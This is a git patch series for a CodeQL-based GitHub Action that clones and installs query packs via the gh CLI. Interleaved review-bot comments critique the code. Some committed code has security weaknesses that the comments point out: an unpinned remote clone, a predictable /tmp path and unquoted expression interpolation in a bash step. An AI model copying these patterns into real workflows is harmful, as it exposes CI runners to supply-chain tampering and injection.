b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.1-dev +version: 0.0.1 dependencies: codeql/controlflow: ^0.1.7 codeql/yaml: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fb5d29fb9577..346079df9842 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -9,6 +9,6 @@ suites: codeql-suites extractor: yaml defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - codeql/actions-all: ${workspace} + githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true tests: test From 959a974c8b848176a6c2416f93afb4ab370761d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 13:32:05 +0100 Subject: [PATCH 040/707] feat(action): clone pack (not use the registry) --- .github/action/dist/index.js | 83 +++++++++++++++++++++++++++++++++++- .github/action/src/codeql.ts | 1 - .github/action/src/gh.ts | 54 +++++++++++++++++++++++ .github/action/src/index.ts | 13 +++++- 4 files changed, 148 insertions(+), 3 deletions(-) create mode 100644 .github/action/src/gh.ts diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 23c035881624..9c0a19375f43 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js 
@@ -28716,6 +28716,79 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; +/***/ }), + +/***/ 1772: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.clonePackRepo = exports.runCommandJson = exports.runCommand = exports.newGHConfig = void 0; +const path = __importStar(__nccwpck_require__(1017)); +const core = __importStar(__nccwpck_require__(2186)); +const toolrunner = __importStar(__nccwpck_require__(8159)); +async function newGHConfig() { + return { + path: "", + }; +} +exports.newGHConfig = newGHConfig; +async function runCommand(config, args) { + var bin = path.join(config.path, "gh"); + let output = ""; + var options = { + listeners: { + stdout: (data) => { + output += data.toString(); + }, + }, + }; + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running 
command :: ${bin} ${args.join(" ")}`); + return output.trim(); +} +exports.runCommand = runCommand; +async function runCommandJson(config, args) { + return JSON.parse(await runCommand(config, args)); +} +exports.runCommandJson = runCommandJson; +async function clonePackRepo(gh) { + try { + await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + return true; + } + catch (error) { + core.warning("Failed to clone pack from GitHub..."); + } + return false; +} +exports.clonePackRepo = clonePackRepo; + + /***/ }), /***/ 6144: @@ -28751,12 +28824,17 @@ exports.run = void 0; const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); const cql = __importStar(__nccwpck_require__(950)); +const gh = __importStar(__nccwpck_require__(1772)); /** * The main function for the action. * @returns {Promise} Resolves when the action is complete. */ async function run() { try { + // set up gh + var ghc = await gh.newGHConfig(); + core.debug(`GH CLI found at '${ghc.path}'`); + await gh.runCommand(ghc, ["version"]); // set up codeql var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); @@ -28774,10 +28852,13 @@ async function run() { } // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); + //var pack_downloaded = await cql.downloadPack(codeql); + var pack_downloaded = await gh.clonePackRepo(ghc); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + core.info(`Pack path: '${action_path}'`); codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Codeql pack path: '${codeql.path}'`); core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); } else { diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 3826737a0824..85d7e33954d3 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -3,7 +3,6 @@ import * as path from "path"; import * as core from "@actions/core"; import * as toolcache from "@actions/tool-cache"; -import * as github from "@actions/github"; import * as toolrunner from "@actions/exec/lib/toolrunner"; export interface CodeQLConfig { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts new file mode 100644 index 000000000000..4a8fc09ff9c4 --- /dev/null +++ b/.github/action/src/gh.ts @@ -0,0 +1,54 @@ +import * as fs from "fs"; +import * as path from "path"; + +import * as core from "@actions/core"; +import * as toolcache from "@actions/tool-cache"; +import * as toolrunner from "@actions/exec/lib/toolrunner"; + +export interface GHConfig { + // The path to the codeql bundle. + path: string; +} + +export async function newGHConfig(): Promise { + return { + path: "", + }; +} + +export async function runCommand( + config: GHConfig, + args: string[], +): Promise { + var bin = path.join(config.path, "gh"); + let output = ""; + var options = { + listeners: { + stdout: (data: Buffer) => { + output += data.toString(); + }, + }, + }; + + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + + return output.trim(); +} + +export async function runCommandJson( + config: GHConfig, + args: string[], +): Promise { + return JSON.parse(await runCommand(config, args)); +} + +export async function clonePackRepo(gh: GHConfig): Promise { + try { + await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + return true; + } catch (error) { + core.warning("Failed to clone pack from GitHub..."); + } + return false; +} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b1a4fc80c644..99b9d044d8f0 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts 
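Review bot: `clonePackRepo` clones the default branch of `GitHubSecurityLab/codeql-actions` on every run with no ref or commit pin and no integrity check, so whatever that branch holds at run time decides which queries the scan executes; pin it, e.g. `await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions", "--", "--branch", PACK_REF, "--depth", "1"]);`, or verify the checked-out commit afterwards. Because `newGHConfig` returns `path: ""`, `path.join("", "gh")` yields the bare name `gh` and the binary is resolved through the runner's `PATH` rather than a known location; resolve it once and store the absolute path in the config. The `catch` in `clonePackRepo` also discards `error`, so a failed clone leaves only a generic warning in the log; use `core.warning(\`Failed to clone pack from GitHub: ${error}\`)`. The unused `fs` and `toolcache` imports at the top of the new file can be dropped.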
@@ -1,6 +1,7 @@ import * as path from "path"; import * as core from "@actions/core"; import * as cql from "./codeql"; +import * as gh from "./gh"; /** * The main function for the action. @@ -8,6 +9,13 @@ import * as cql from "./codeql"; */ export async function run(): Promise { try { + // set up gh + var ghc = await gh.newGHConfig(); + + core.debug(`GH CLI found at '${ghc.path}'`); + + await gh.runCommand(ghc, ["version"]); + // set up codeql var codeql = await cql.newCodeQL(); @@ -30,11 +38,14 @@ export async function run(): Promise { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); + //var pack_downloaded = await cql.downloadPack(codeql); + var pack_downloaded = await gh.clonePackRepo(ghc); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + core.info(`Pack path: '${action_path}'`); codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Codeql pack path: '${codeql.path}'`); core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); } else { From e2699c31f8dd9871dd62dafa632ad19f246d0ccf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 13:56:58 +0100 Subject: [PATCH 041/707] feat(action): clone and install local packs --- .github/action/dist/index.js | 35 ++++++++++++++++++++++++++++++----- .github/action/src/codeql.ts | 21 +++++++++++++++++++++ .github/action/src/gh.ts | 12 ++++++++++-- .github/action/src/index.ts | 5 ++++- 4 files changed, 65 insertions(+), 8 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 9c0a19375f43..eb691f27095c 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js 
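Review bot: The new log line `core.info(\`Codeql pack path: '${codeql.path}'\`)` prints `codeql.path`, which `newCodeQL` uses for the CLI location (it is logged as "CodeQL CLI found at" a few lines earlier), under a "pack path" label; the following line already logs `codeql.pack`, so this line is misleading and should be removed. When `clonePackRepo` returns false the action silently switches to the pack bundled with the action with only `core.info`, meaning a transient network failure changes which query pack runs without any visible warning; use `core.warning` for the fallback so it stands out in the job log. The `core.debug(\`GH CLI found at '${ghc.path}'\`)` message is also emitted before `gh version` has run and, with `path: ""`, prints an empty location. `run()` begins and ends outside this hunk.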
@@ -28596,7 +28596,7 @@ var __importStar = (this && this.__importStar) || function (mod) { return result; }; Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.installPack = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; const fs = __importStar(__nccwpck_require__(7147)); const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); @@ -28613,10 +28613,15 @@ async function newCodeQL() { }; } exports.newCodeQL = newCodeQL; -async function runCommand(config, args) { +async function runCommand(config, args, cwd) { var bin = path.join(config.path, "codeql"); let output = ""; + var _cwd = process.cwd(); + if (cwd) { + _cwd = cwd; + } var options = { + cwd: cwd, listeners: { stdout: (data) => { output += data.toString(); @@ -28669,6 +28674,19 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; +async function installPack(codeql, path) { + try { + await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path); + return true; + } + catch (error) { + core.warning("Failed to install local packs ..."); + } + core.info("Installed local packs ..."); + return false; +} +exports.installPack = installPack; async function codeqlDatabaseCreate(codeql) { // get runner temp directory for database var temp = process.env["RUNNER_TEMP"]; 
@@ -28776,9 +28794,14 @@ async function runCommandJson(config, args) { return JSON.parse(await runCommand(config, args)); } exports.runCommandJson = runCommandJson; -async function clonePackRepo(gh) { +async function clonePackRepo(gh, path) { try { - await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + await runCommand(gh, [ + "repo", + "clone", + "GitHubSecurityLab/codeql-actions", + path, + ]); return true; } catch (error) { @@ -28853,7 +28876,9 @@ async function run() { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); //var pack_downloaded = await cql.downloadPack(codeql); - var pack_downloaded = await gh.clonePackRepo(ghc); + let pack_path = "/tmp/codeql-actions"; + var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); + await cql.installPack(codeql, pack_path); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); core.info(`Pack path: '${action_path}'`); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 85d7e33954d3..906e7876f663 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -34,10 +34,16 @@ export async function newCodeQL(): Promise { export async function runCommand( config: CodeQLConfig, args: string[], + cwd?: string, ): Promise { var bin = path.join(config.path, "codeql"); let output = ""; + var _cwd: string = process.cwd(); + if (cwd) { + _cwd = cwd; + } var options = { + cwd: cwd, listeners: { stdout: (data: Buffer) => { output += data.toString(); 
@@ -99,6 +105,21 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { return false; } +export async function installPack( + codeql: CodeQLConfig, + path: string, +): Promise { + try { + await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path); + return true; + } catch (error) { + core.warning("Failed to install local packs ..."); + } + core.info("Installed local packs ..."); + return false; +} + export async function codeqlDatabaseCreate( codeql: CodeQLConfig, ): Promise { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index 4a8fc09ff9c4..a80f4b4f59c5 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -43,9 +43,17 @@ export async function runCommandJson( return JSON.parse(await runCommand(config, args)); } -export async function clonePackRepo(gh: GHConfig): Promise { +export async function clonePackRepo( + gh: GHConfig, + path: string, +): Promise { try { - await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + await runCommand(gh, [ + "repo", + "clone", + "GitHubSecurityLab/codeql-actions", + path, + ]); return true; } catch (error) { core.warning("Failed to clone pack from GitHub..."); diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 99b9d044d8f0..24daf06f537b 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -39,7 +39,10 @@ export async function run(): Promise { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); //var pack_downloaded = await cql.downloadPack(codeql); - var pack_downloaded = await gh.clonePackRepo(ghc); + + let pack_path = "/tmp/codeql-actions"; + var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); + await cql.installPack(codeql, pack_path); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); From c58c4e0d54c19514f172ed1787624c44b9888fbd Mon Sep 17 00:00:00 2001 
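Review bot: The `catch (error)` in `installPack` drops the caught value and emits only a fixed warning, so a dependency-resolution or registry failure during `codeql pack install` cannot be diagnosed from the job log; use `core.warning(\`Failed to install local packs: ${error}\`)`. The parameter is named `path`, which shadows the `path` module imported at the top of `codeql.ts`; renaming it to `dir` avoids a confusing failure the moment `path.join` is needed inside the function. `codeqlDatabaseCreate`, whose first lines appear at the end of the hunk, continues outside it.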
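Review bot: The new `path: string` parameter of `clonePackRepo` shadows the `path` module that `gh.ts` imports at the top of the file (`import * as path from "path"`), which is harmless today only because the function never calls `path.join`; rename it, e.g. `dest: string,`, and pass `dest` in the argument array. The caught `error` is still discarded in favour of a generic warning, so the reason for a clone failure (auth, network, existing directory) never reaches the log; include it in the `core.warning` message.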
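Review bot: `let pack_path = "/tmp/codeql-actions";` is a fixed, predictable path in a world-writable directory; on a self-hosted or reused runner a pre-existing directory or symlink at that path makes `gh repo clone` fail or, worse, leaves the action operating on content it did not create. `installPack` is then called unconditionally before `pack_downloaded` is checked, so after a failed clone `codeql pack install` still runs inside whatever is at `/tmp/codeql-actions`. Use the runner-private temp directory that `codeqlDatabaseCreate` already reads, e.g. `const pack_path = fs.mkdtempSync(path.join(process.env["RUNNER_TEMP"] || os.tmpdir(), "codeql-actions-"));` (with `fs`/`os` imported), and only call `installPack` once the clone has succeeded. `run()` begins and ends outside this hunk.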
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:06:46 +0100 Subject: [PATCH 042/707] feat(actions): refactor as composite action to be able to pass env vars --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 1 - .github/action/src/gh.ts | 2 +- action.yml | 15 +++++++++++++-- 4 files changed, 16 insertions(+), 6 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index eb691f27095c..49c029514146 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28678,12 +28678,12 @@ async function installPack(codeql, path) { try { await runCommand(codeql, ["pack", "install"], path); await runCommand(codeql, ["pack", "install"], path); + core.info("Installed local packs ..."); return true; } catch (error) { core.warning("Failed to install local packs ..."); } - core.info("Installed local packs ..."); return false; } exports.installPack = installPack; @@ -30815,4 +30815,4 @@ module.exports = parseParams /******/ module.exports = __webpack_exports__; /******/ /******/ })() -; \ No newline at end of file +; diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 906e7876f663..38c222cb2a5b 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -116,7 +116,6 @@ export async function installPack( } catch (error) { core.warning("Failed to install local packs ..."); } - core.info("Installed local packs ..."); return false; } diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index a80f4b4f59c5..a4e187053bec 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -12,7 +12,7 @@ export interface GHConfig { export async function newGHConfig(): Promise { return { - path: "", + path: "/usr/bin/", }; } diff --git a/action.yml b/action.yml index 03054c195be9..976e35d8f7c5 100644 --- a/action.yml +++ b/action.yml 
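Review bot: Hard-coding `path: "/usr/bin/"` is an improvement over resolving `gh` through `PATH`, but it bakes in the layout of one runner image with no comment explaining the assumption; on a runner where `gh` lives elsewhere, `runCommand` fails later with a bare spawn error rather than a clear message. Add a comment such as `// Assumes the GitHub-hosted Ubuntu image, where gh is installed in /usr/bin` and, presumably, have `newGHConfig` verify the binary exists (for example with `fs.existsSync`) and fail with an explicit error naming the expected location.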
@@ -14,6 +14,17 @@ inputs: description: "SARIF File Output" default: "codeql-actions.sarif" +# runs: +# using: "node16" +# main: ".github/action/dist/index.js" + runs: - using: "node16" - main: ".github/action/dist/index.js" + using: 'composite' + steps: + - name: Do something with context + shell: bash + env: + GH_TOKEN: ${{ github.token }} + run: | + node .github/action/dist/index.js + node ${{ github.action_path }}/.github/action/dist/index.js From e9f30062046c6adbfe8b72ccc6b4b9ad95ac3729 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:10:52 +0100 Subject: [PATCH 043/707] fix(actions): pass the qlpack dirs --- .github/action/src/codeql.ts | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 38c222cb2a5b..1f604f9c89a7 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -107,11 +107,11 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { export async function installPack( codeql: CodeQLConfig, - path: string, + dir: string, ): Promise { try { - await runCommand(codeql, ["pack", "install"], path); - await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { core.warning("Failed to install local packs ..."); From a94793fc0996065c3deb0fccf3534c684c45c333 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:14:53 +0100 Subject: [PATCH 044/707] fix(actions): pass the qlpack dirs --- .github/action/src/codeql.ts | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 1f604f9c89a7..7cb1dab48e59 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
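Review bot: The `run:` step interpolates `${{ github.action_path }}` unquoted into bash, which is the expression-in-script pattern this project's own queries flag and breaks on any path containing whitespace; pass it through the environment instead: `ACTION_PATH: ${{ github.action_path }}` under `env:` and `run: node "$ACTION_PATH/.github/action/dist/index.js"`. The first command, `node .github/action/dist/index.js`, resolves relative to the caller's workspace rather than the action checkout, so for a consuming repository it either fails or executes a file from that repository, and the script is invoked twice in the same step. The step name `Do something with context` is a placeholder and should describe the step, e.g. `Run CodeQL Actions analysis`.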
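Review bot: `path.join(dir, "/ql/lib")` works only because `path.join` normalises the leading slash away; written this way the second argument reads like an absolute path and invites a copy into `path.resolve`, where it would discard `dir`. Prefer `path.join(dir, "ql", "lib")` and `path.join(dir, "ql", "src")`. `installPack` ends outside this hunk.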
@@ -34,14 +34,15 @@ export async function newCodeQL(): Promise { export async function runCommand( config: CodeQLConfig, args: string[], - cwd?: string, + cwd_arg?: string, ): Promise { var bin = path.join(config.path, "codeql"); let output = ""; - var _cwd: string = process.cwd(); - if (cwd) { - _cwd = cwd; + var cwd: string = process.cwd(); + if (cwd_arg) { + cwd = cwd_arg; } + core.info("Current working directory: " + cwd); var options = { cwd: cwd, listeners: { From 04a2ae9ad34bd3b1bf12b84e596f53bf186326b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:29:03 +0100 Subject: [PATCH 045/707] fix(actions): ql pack installation --- .github/action/src/gh.ts | 3 --- .github/action/src/index.ts | 33 +++++++++++++++++++-------------- 2 files changed, 19 insertions(+), 17 deletions(-) diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index a4e187053bec..668e559e40bf 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -1,8 +1,5 @@ -import * as fs from "fs"; import * as path from "path"; - import * as core from "@actions/core"; -import * as toolcache from "@actions/tool-cache"; import * as toolrunner from "@actions/exec/lib/toolrunner"; export interface GHConfig { diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 24daf06f537b..aea847298b4d 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts 
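Review bot: `core.info("Current working directory: " + cwd)` now prints at info level for every CodeQL invocation, which adds a line to the job log on each call while the matching "Finished running command" message in the other `runCommand` is emitted with `core.debug`; use `core.debug(\`Current working directory: ${cwd}\`)` for consistency. A short comment on the new parameter, such as `// cwd_arg: directory to run the CLI in; defaults to the process working directory`, would document the contract. `runCommand` continues outside this hunk.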
@@ -37,24 +37,29 @@ export async function run(): Promise { } // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - //var pack_downloaded = await cql.downloadPack(codeql); + // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + // var pack_downloaded = await cql.downloadPack(codeql); + core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; - var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); - await cql.installPack(codeql, pack_path); - - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - core.info(`Pack path: '${action_path}'`); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Codeql pack path: '${codeql.path}'`); - - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } else { - core.info(`Pack downloaded '${codeql.pack}'`); + var pack_cloned = await gh.clonePackRepo(ghc, pack_path); + core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); + + if (pack_cloned === false) { + throw new Error("Could not clone the actions ql pack"); } + core.info(`Installing CodeQL Actions packs from '${pack_path}'`); + var pack_installed = await cql.installPack(codeql, pack_path); + + if (pack_installed === false) { + throw new Error("Could not install the actions ql packs"); + } + + core.info(`Pack path: '${pack_path}'`); + codeql.pack = path.join(pack_path, "ql", "src"); + core.info(`Codeql Queries pack path: '${codeql.pack}'`); + core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); From b11d8dad4905269e6023ae20cfbac501638ef755 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:31:07 +0100 Subject: [PATCH 046/707] fix(actions): ql pack installation --- .github/action/dist/index.js | 50 +++++++++++++++++++----------------- 1 file changed, 26 insertions(+), 24 deletions(-) 
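Review bot: `core.info(\`Cloned CodeQL Actions pack into '${pack_path}'\`)` is emitted immediately after the clone call and before `pack_cloned` is inspected, so a failed clone logs a success line followed by the thrown error; move it below the `if (pack_cloned === false)` block. The preceding `core.info(\`Cloning CodeQL Actions pack into '${codeql.pack}'\`)` names `codeql.pack`, which is not the clone destination, while `pack_path` is only declared on the next line; declare `pack_path` first and log `\`Cloning CodeQL Actions pack into '${pack_path}'\``. The fixed `/tmp/codeql-actions` destination is kept here rather than a runner-private temp directory such as `RUNNER_TEMP`. `run()` begins and ends outside this hunk.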
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 49c029514146..3d69e1f81ce6 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28613,13 +28613,14 @@ async function newCodeQL() { }; } exports.newCodeQL = newCodeQL; -async function runCommand(config, args, cwd) { +async function runCommand(config, args, cwd_arg) { var bin = path.join(config.path, "codeql"); let output = ""; - var _cwd = process.cwd(); - if (cwd) { - _cwd = cwd; + var cwd = process.cwd(); + if (cwd_arg) { + cwd = cwd_arg; } + core.info("Current working directory: " + cwd); var options = { cwd: cwd, listeners: { @@ -28674,11 +28675,10 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; -async function installPack(codeql, path) { +async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "install"], path); - await runCommand(codeql, ["pack", "install"], path); - core.info("Installed local packs ..."); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { @@ -28771,7 +28771,7 @@ const core = __importStar(__nccwpck_require__(2186)); const toolrunner = __importStar(__nccwpck_require__(8159)); async function newGHConfig() { return { - path: "", + path: "/usr/bin/", }; } exports.newGHConfig = newGHConfig; 
@@ -28874,21 +28874,23 @@ async function run() { throw new Error("CodeQL Yaml extractor not installed"); } // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - //var pack_downloaded = await cql.downloadPack(codeql); + // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + // var pack_downloaded = await cql.downloadPack(codeql); + core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; - var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); - await cql.installPack(codeql, pack_path); - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - core.info(`Pack path: '${action_path}'`); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Codeql pack path: '${codeql.path}'`); - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } - else { - core.info(`Pack downloaded '${codeql.pack}'`); - } + var pack_cloned = await gh.clonePackRepo(ghc, pack_path); + core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); + if (pack_cloned === false) { + throw new Error("Could not clone the actions ql pack"); + } + core.info(`Installing CodeQL Actions packs from '${pack_path}'`); + var pack_installed = await cql.installPack(codeql, pack_path); + if (pack_installed === false) { + throw new Error("Could not install the actions ql packs"); + } + core.info(`Pack path: '${pack_path}'`); + codeql.pack = path.join(pack_path, "ql", "src"); + core.info(`Codeql Queries pack path: '${codeql.pack}'`); core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); core.info("Running CodeQL analysis..."); @@ -30815,4 +30817,4 @@ module.exports = parseParams /******/ module.exports = __webpack_exports__; /******/ /******/ })() -; +; \ No newline at end of file From 41639dd0e2707f39c2084a5b1c5d1914161dd401 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:37:43 +0100 Subject: [PATCH 047/707] fix(actions): ql pack installation --- .github/action/dist/index.js | 3 --- .github/action/src/index.ts | 4 ---- 2 files changed, 7 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 3d69e1f81ce6..c482d87b4f2e 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28873,9 +28873,6 @@ async function run() { core.setFailed("CodeQL Yaml extractor not installed"); throw new Error("CodeQL Yaml extractor not installed"); } - // download pack - // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - // var pack_downloaded = await cql.downloadPack(codeql); core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; var pack_cloned = await gh.clonePackRepo(ghc, pack_path); diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index aea847298b4d..717782b555cf 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -36,10 +36,6 @@ export async function run(): Promise { throw new Error("CodeQL Yaml extractor not installed"); } - // download pack - // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - // var pack_downloaded = await cql.downloadPack(codeql); - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; var pack_cloned = await gh.clonePackRepo(ghc, pack_path); From b3bab160d2a0e0a07dfdbe757d15cb5de8c19666 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:41:21 +0100 Subject: [PATCH 048/707] fix(actions): ql pack installation --- .github/action/src/codeql.ts | 2 ++ action.yml | 1 - 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 7cb1dab48e59..b999b698d142 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
